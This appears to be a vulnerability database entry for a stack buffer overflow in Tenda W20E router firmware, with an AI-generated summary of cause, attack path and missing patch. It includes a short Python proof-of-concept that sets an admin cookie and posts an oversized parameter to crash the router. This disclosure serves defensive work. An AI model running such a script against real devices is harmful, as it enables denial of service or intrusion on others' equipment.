CVE-2026-11522
Description
A stack-based buffer overflow in Tenda W20E firmware V15.11.0.6 allows remote attackers to crash the device or achieve RCE via a crafted portMirrorMirroredPorts parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stack-based buffer overflow in Tenda W20E firmware V15.11.0.6 allows remote attackers to crash the device or achieve RCE via a crafted portMirrorMirroredPorts parameter.
Vulnerability
A stack-based buffer overflow vulnerability exists in the formSetPortMirror function within the /goform/setPortMirror endpoint of Tenda W20E routers running firmware version 15.11.0.6 [1]. The vulnerability arises from the sprintf function's use of the user-controlled portMirrorMirroredPorts parameter without proper bounds checking, allowing it to overflow a 256-byte stack buffer.
Exploitation
An attacker can initiate this attack remotely. The attacker must first establish an authenticated session, potentially by setting a default cookie, and then send a POST request to the /goform/setPortMirror endpoint. By providing a value for the portMirrorMirroredPorts parameter that exceeds 256 bytes, the attacker can overwrite the saved Link Register (LR) on the stack [1].
Impact
Successful exploitation of this vulnerability can lead to a denial-of-service condition, causing the device to crash. In some scenarios, it may also allow an authenticated attacker to achieve Remote Code Execution (RCE) with the privileges of the affected process [1].
Mitigation
No specific patch or fixed firmware version has been disclosed in the available references. Users are advised to consult Tenda's official website for any potential updates or advisories [2].
AI Insight generated on Jun 8, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The function formSetPortMirror uses sprintf to write user-controlled input into a fixed-size buffer without bounds checking, leading to a stack-based buffer overflow."
Attack vector
An attacker can remotely trigger this vulnerability by sending a crafted POST request to the `/goform/setPortMirror` endpoint. The request must include a manipulated `portMirrorMirroredPorts` argument containing a string longer than 256 bytes. This overflow overwrites the saved Link Register on the stack, potentially leading to code execution [ref_id=1].
Affected code
The vulnerability resides in the `formSetPortMirror` function, which handles port mirroring configuration. Specifically, the function uses `sprintf` to format the user-controlled `portMirrorMirroredPorts` parameter into a fixed-size stack buffer named `sMibValue` (256 bytes) without performing bounds checking [ref_id=1].
What the fix does
The patch is not available in the provided information. The advisory recommends that users update to the latest version of the firmware to mitigate this vulnerability. Without a patch, the exact fix cannot be described.
Preconditions
- authThe attacker must be authenticated to the device.
- networkThe attacker can initiate the attack remotely.
Reproduction
import requests import base64
host = "192.168.0.1" s = requests.session()
def trigger_overflow(): encoded_pwd = base64.b64encode(b"aaaa").decode() s.post(f"http://{host}/goform/setQuickCfgWifiAndLogin", data={"sysUserPassword": encoded_pwd}) if not s.cookies.get("user"): s.cookies.set("user", "admin")
url = f"http://{host}/goform/setPortMirror" payload = "A" * 1000 resp = s.post(url, data={"portMirrorMirroredPorts": payload,"portMirrorEn":"true"}, timeout=5) print(resp.content)
Generated on Jun 8, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6News mentions
1- Tenda Routers: 13 Stack Overflow and Command Injection Vulnerabilities DisclosedVypr Intelligence · Jun 8, 2026